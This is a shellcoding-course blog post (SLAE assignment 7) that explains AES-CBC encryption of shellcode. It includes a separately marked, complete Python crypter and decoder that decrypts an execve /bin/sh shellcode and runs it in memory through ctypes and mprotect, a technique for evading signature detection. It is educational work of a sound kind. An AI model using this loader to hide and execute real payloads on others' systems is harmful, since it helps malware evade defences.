0x07 SLAE - Custom Crypter

Introduction

In this last assignment, the goal is to develop our own crypter using a known encryption scheme, in any language. I decided to do it in Python because it is pretty straightforward. The encryption algorithm I chose is AES, which stands for Advanced Encryption Standard, in Cipher Block Chaining (CBC) mode. In CBC mode each block of plaintext is XORed with the previous ciphertext block before being encrypted; the first block is XORed with an initialisation vector (IV) instead. AES works on 16-byte blocks, so the shellcode has to be padded to a multiple of 16 bytes before encryption and the padding stripped again after decryption. Here is a good illustration of the encryption pattern:

Source: Wikipedia

Crypter

The following code is the crypter, which encrypts the original shellcode with AES-CBC under the key that is hard-coded in the script.

Running this script outputs the encrypted shellcode as base64, which we then paste into the payload, i.e. the decoder. Normally the decoder is the payload that is sent to the victim, and an attacker would send a compiled version of it because it is easier to execute. For the purpose of this assignment, I will not convert the Python script into a compiled binary.

AEScrypter.py result

Decoder

The decoder script takes the encrypted shellcode as input and decrypts it with the same key that was passed to the crypter. Once the shellcode has been decrypted, we use the ctypes library to run it in memory. Because the key ships inside the decoder, this only hides the shellcode from static signature matching: anyone who has the decoder can recover the plaintext. CBC also provides no integrity check, so a wrong key or a tampered ciphertext normally surfaces as a padding error during decryption rather than as an explicit failure, and the decoder must not execute whatever comes out in that case.
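The following is an added example of the crypter and decoder pair described in the two sections above, written for this page and not the original AEScrypter.py or decoder script. It assumes the `cryptography` package is installed (pip install cryptography) and that the decoder runs on 32-bit Linux x86, where the constructed sample shellcode is valid. The key, the sample shellcode and the function names are placeholders, not taken from the post. Unlike a fixed IV, it prepends a fresh random IV to every blob, so the same shellcode encrypts differently on every run, and the padding-error failure mode is handled by letting the unpadder raise instead of executing garbage.

```python
#!/usr/bin/env python3
# Added example of an AES-CBC crypter/decoder pair; not the post's own scripts.
# Assumptions: the `cryptography` package is installed, and run_shellcode()
# is executed on 32-bit Linux x86, which is what SAMPLE_SHELLCODE targets.
import base64
import ctypes
import os
from typing import Optional

from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

# Placeholder 128-bit key, hard-coded in both scripts as in the post.
KEY = b"SLAE-assignment7"
# Constructed sample input: the standard 32-bit Linux execve("/bin//sh") stub.
SAMPLE_SHELLCODE = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
                    b"\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80")
BLOCK_BITS = 128  # AES block size; PKCS#7 pads the input up to a whole block


def aes_cbc_encrypt(data: bytes, key: bytes, iv: bytes) -> bytes:
    """Pad with PKCS#7 and encrypt. In CBC each plaintext block is XORed with
    the previous ciphertext block (the IV for the first block) before the AES
    call, so the caller must supply a fresh, unpredictable IV."""
    padder = padding.PKCS7(BLOCK_BITS).padder()
    padded = padder.update(data) + padder.finalize()
    enc = Cipher(algorithms.AES(key), modes.CBC(iv), default_backend()).encryptor()
    return enc.update(padded) + enc.finalize()


def aes_cbc_decrypt(ciphertext: bytes, key: bytes, iv: bytes) -> bytes:
    """Decrypt and strip the padding. With a wrong key or a tampered block the
    unpadder normally raises ValueError; CBC has no integrity check of its own,
    so that exception is the only signal the decoder gets."""
    dec = Cipher(algorithms.AES(key), modes.CBC(iv), default_backend()).decryptor()
    padded = dec.update(ciphertext) + dec.finalize()
    unpadder = padding.PKCS7(BLOCK_BITS).unpadder()
    return unpadder.update(padded) + unpadder.finalize()


def crypter(shellcode: bytes, key: bytes, iv: Optional[bytes] = None) -> str:
    """Crypter side: return base64(iv || ciphertext), ready to paste into the
    decoder. A random IV per run means the same shellcode never yields the
    same blob twice."""
    iv = os.urandom(16) if iv is None else iv
    return base64.b64encode(iv + aes_cbc_encrypt(shellcode, key, iv)).decode()


def decoder(blob_b64: str, key: bytes) -> bytes:
    """Decoder side: split off the IV and recover the raw shellcode bytes."""
    blob = base64.b64decode(blob_b64)
    return aes_cbc_decrypt(blob[16:], key, blob[:16])


def run_shellcode(shellcode: bytes) -> None:
    """Copy the decrypted bytes into a page-aligned buffer, make it RWX with
    mprotect and jump to it through a ctypes function pointer (Linux only)."""
    libc = ctypes.CDLL("libc.so.6")
    libc.valloc.restype = ctypes.c_void_p   # default int restype truncates pointers on 64-bit
    libc.valloc.argtypes = [ctypes.c_size_t]
    libc.mprotect.argtypes = [ctypes.c_void_p, ctypes.c_size_t, ctypes.c_int]
    buf = libc.valloc(len(shellcode))
    ctypes.memmove(buf, shellcode, len(shellcode))
    if libc.mprotect(buf, len(shellcode), 0x7) != 0:   # PROT_READ|PROT_WRITE|PROT_EXEC
        raise OSError("mprotect failed")
    ctypes.CFUNCTYPE(None)(buf)()


if __name__ == "__main__":
    blob = crypter(SAMPLE_SHELLCODE, KEY)   # what the crypter prints
    print("encrypted shellcode:", blob)
    sc = decoder(blob, KEY)                 # what the decoder recovers
    if sc != SAMPLE_SHELLCODE:
        raise SystemExit("round trip failed, refusing to execute")
    run_shellcode(sc)                       # drops into /bin/sh on 32-bit Linux
```

The decoder only executes the buffer after decryption succeeded; if the key is wrong, the unpadder raises before run_shellcode is reached. The first-block behaviour can be checked against the FIPS-197 AES-128 test vector: with an all-zero IV the first CBC block equals a plain AES encryption of the first plaintext block.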

Conclusion

The x86 Assembly Language and Shellcoding on Linux course taught me a lot of things. I started with little knowledge of shellcoding and ended up with something that is much more familiar to me. I still have a lot to learn, and this is why I won't stop my journey here. The next step would probably be SLAE x64 and maybe OSCE. I suggest that anyone who would like to learn more about assembly and shellcode take this course. Thanks to Vivek Ramachandran for the great course and for sharing his knowledge with the world.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert Certification

http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE-1374
